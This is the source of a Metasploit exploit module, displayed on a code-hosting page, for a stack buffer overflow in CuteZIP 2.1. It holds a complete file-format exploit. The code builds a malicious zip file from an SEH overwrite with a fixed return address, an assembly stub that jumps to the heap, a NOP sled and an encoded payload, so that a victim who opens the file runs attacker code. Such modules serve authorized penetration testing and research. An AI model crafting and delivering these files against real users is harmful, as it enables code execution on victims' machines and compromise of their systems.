Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/cutezip_bof.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rex/zip'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = NormalRanking

10


11
  include Msf::Exploit::FILEFORMAT

12
  include Msf::Exploit::Remote::Seh

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'GlobalSCAPE CuteZIP Stack Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a stack-based buffer overflow vulnerability in version 2.1

21
          of CuteZIP.

22


23
          In order for the command to be executed, an attacker must convince the target user

24
          to open a specially crafted zip file with CuteZIP. By doing so, an attacker can

25
          execute arbitrary code as the target user.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'C4SS!0 G0M3S <Louredo_[at]hotmail.com>', # Initial discovery, poc

30
          'juan vazquez' # Metasploit

31
        ],

32
        'References' => [

33
          [ 'OSVDB', '85709' ],

34
          [ 'EDB', '16162' ],

35
          [ 'BID', '46375' ]

36
        ],

37
        'Platform' => [ 'win' ],

38
        'Payload' => {

39
          'BadChars' => "",

40
          'DisableNops' => true,

41
          'Space' => 3000 # Limit due to the heap chunk size where the payload is stored

42
        },

43
        'Targets' => [

44
          [

45
            # Tested successfully on:

46
            # * Windows XP SP3

47
            # * Windows Vista SP2

48
            # * Windows 7 SP1

49
            # (NO DEP)

50
            'CuteZIP 2.1 / Windows Universal',

51
            {

52
              'Ret' => 0x0040112F, # pop, pop, ret from CuteZIP.exe

53
              'Offset' => 1148,

54
              'Nops' => 398

55
            }

56
          ],

57
        ],

58
        'DisclosureDate' => '2011-02-12',

59
        'DefaultTarget' => 0,

60
        'Notes' => {

61
          'Reliability' => UNKNOWN_RELIABILITY,

62
          'Stability' => UNKNOWN_STABILITY,

63
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

64
        }

65
      )

66
    )

67


68
    register_options(

69
      [

70
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip'])

71
      ]

72
    )

73
  end

74


75
  def exploit

76
    redirect_heap = <<-ASM

77
      popad

78
      popad

79
      popad

80
      push ecx

81
      pop eax

82
      call eax

83
    ASM

84


85
    crafted_file = rand_text(target['Offset'])

86
    crafted_file << generate_seh_record(target.ret)

87
    crafted_file << Metasm::Shellcode.assemble(Metasm::Ia32.new, redirect_heap).encode_string

88
    crafted_file << make_nops(1) * target['Nops']

89
    crafted_file << payload.encoded

90


91
    # Create the file

92
    zip = Rex::Zip::Archive.new

93
    xtra = rand_text(4)

94
    zip.add_file(crafted_file, xtra)

95


96
    print_status("Creating '#{datastore['FILENAME']}' file...")

97
    file_create(zip.pack)

98
  end

99
end

100


101